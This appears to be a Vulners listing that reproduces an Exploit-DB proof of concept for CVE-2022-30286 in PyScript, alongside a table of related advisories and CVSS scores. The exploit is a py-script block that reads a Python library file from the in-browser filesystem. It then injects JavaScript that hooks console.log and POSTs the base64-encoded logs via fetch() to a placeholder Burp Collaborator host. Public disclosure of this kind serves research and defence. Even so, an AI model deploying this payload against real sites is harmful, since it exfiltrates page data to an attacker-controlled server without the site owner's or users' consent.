Lucene search
K

PyScript - Read Remote Python Source Code

🗓️ 11 May 2022 00:00:00Reported by Momen EldawakhlyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 467 Views

PyScript - Read Remote Python Source Code. Exploit Title: PyScript Remote Emscripten VMemory Python libraries Source Codes Read. Exploit Author: Momen Eldawakhly (Cyber Guy). CVE-2022-3028

Related
Code
ReporterTitlePublishedViews
Family
0day.today
PyScript - Read Remote Python Source Code Vulnerability
12 May 202200:00
zdt
ATTACKERKB
CVE-2022-30286
9 May 202212:15
attackerkb
Circl
CVE-2022-30286
9 May 202217:00
circl
CNNVD
PyScript 安全漏洞
9 May 202200:00
cnnvd
CVE
CVE-2022-30286
9 May 202212:01
cve
Cvelist
CVE-2022-30286
9 May 202212:01
cvelist
NVD
CVE-2022-30286
9 May 202212:15
nvd
Packet Storm
PyScript 2022-05-04-Alpha Source Code Disclosure
11 May 202200:00
packetstorm
Prion
Code injection
9 May 202212:15
prion
RedhatCVE
CVE-2022-30286
23 May 202501:18
redhatcve
Rows per page
# Exploit Title: PyScript Remote Emscripten VMemory Python libraries
Source Codes Read
# Date: 5-9-2022
# Exploit Author: Momen Eldawakhly (Cyber Guy)
# Vendor Homepage: https://pyscript.net/
# Software Link: https://github.com/pyscript/pyscript
# Version: 2022-05-04-Alpha
# Tested on: Ubuntu Apache Server
# CVE : CVE-2022-30286

<py-script>
x = "CyberGuy"
if x == "CyberGuy":
    with open('/lib/python3.10/asyncio/tasks.py') as output:
        contents = output.read()
        print(contents)
print('<script>console.pylog = console.log; console.logs = []; console.log = function(){     console.logs.push(Array.from(arguments));     console.pylog.apply(console, arguments);fetch("http://YOURburpcollaborator.net/", {method: "POST",headers: {"Content-Type": "text/plain;charset=utf-8"},body: JSON.stringify({"content": btoa(console.logs)})});}</script>')
</py-script>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 May 2022 00:00Current
7High risk
Vulners AI Score7
CVSS 25
CVSS 3.17.5
EPSS0.30797
467